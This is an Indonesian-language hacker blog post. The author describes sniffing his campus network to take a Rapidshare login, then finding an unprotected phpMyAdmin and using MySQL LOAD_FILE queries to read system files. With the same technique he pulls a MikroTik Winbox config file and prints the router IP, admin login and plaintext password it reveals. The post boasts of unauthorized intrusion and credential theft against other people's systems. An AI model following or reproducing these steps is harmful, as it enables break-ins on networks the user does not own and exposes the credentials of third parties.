You are here:Home » winbox » Mysql dan mikrotik hack

Mysql dan mikrotik hack

Kemaren lagi iseng-iseng di kampus, snifing jaringan kampus. eh dapet deh login rapidshare (lumayan punya habis januari yang ini habis februari nambah 1 bulan).

Nah kita terusin soal mysql hack, masih di kampus. scan jaringan port 80 dengan program kesayngan gue netscan di jaringan kampus dan ada beberapa IP terdetek, di test ternyata ada yang pakek Xammp, di test phpmyadmin nya dan bisa masuk tidak d beri password root. http://ipkomputer/phpmyadmin wah bisa masuk. kepikiran soal mysql hack yang di baca dari ezine echo no.16 di sini wah kebuka phpmyadminnya ga di kasih password ternyata, mulai deh mysql hackingnya. di test liat isi boot.ini seperti di echo zine "SELECT LOAD_FILE('c:/boot.ini');" dan keluar


[boot loader]\r\ntimeout=3\r\ndefault=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS\r\n[operating systems]\r\nmulti(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect /TUTag=YAT41W /Kernel=TUKernel.exe\r\nmulti(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional (TuneUp Backup)" /noexecute=optin /fastdetect /TUTag=YAT41W-BAK\r\n


Wah bisa, iseng deh kan di warnet pakek mikrotik dan kalo komputer memakai winbox dan passwordnya di keep password pasti kesimpen di C:\Documents and Settings\warnet\Application Data\Mikrotik\Winbox\winbox.cfg komputer tersebut. kita masukin deh scriptnya sql di phpmyadminnya "SELECT LOAD_FILE('c:/Documents and Settings/nama user/Application Data/Mikrotik/Winbox/winbox.cfg');". Dan keluar

� \0 typewindow \0 bounds, \0\0�\0\0\0� \0\0 \0\0 \0 host192.168.1.2
\0 loginadmin
\0 noteConfig\r\0
secure-mode\0\n\0\bkeep-pwd \r\0 pwdwifikampus \0\n
list-col-0d\0\0\0 \0\n
list-col-1P\0\0\0 \0\n
list-col-2�\0\0\0 \0
list-sort\0\0\0\0 \0
list-ascend \0\0\0\0\0


Kita dapet IP mikrotik 192.168.1.2 login admin dan password wifikampus mudah bukan

sory kalo tulisannya berantakan masih piyik soalnya :)

[ Shoutz and greetz ]

~ Allah Subhanahu Wa Ta'ala
~ All e-c-h-o staff and all e-c-h-o members
~ Teman teman di ICT

mysql hack, mikrotik hack, winbox hack, mikrotik, winbox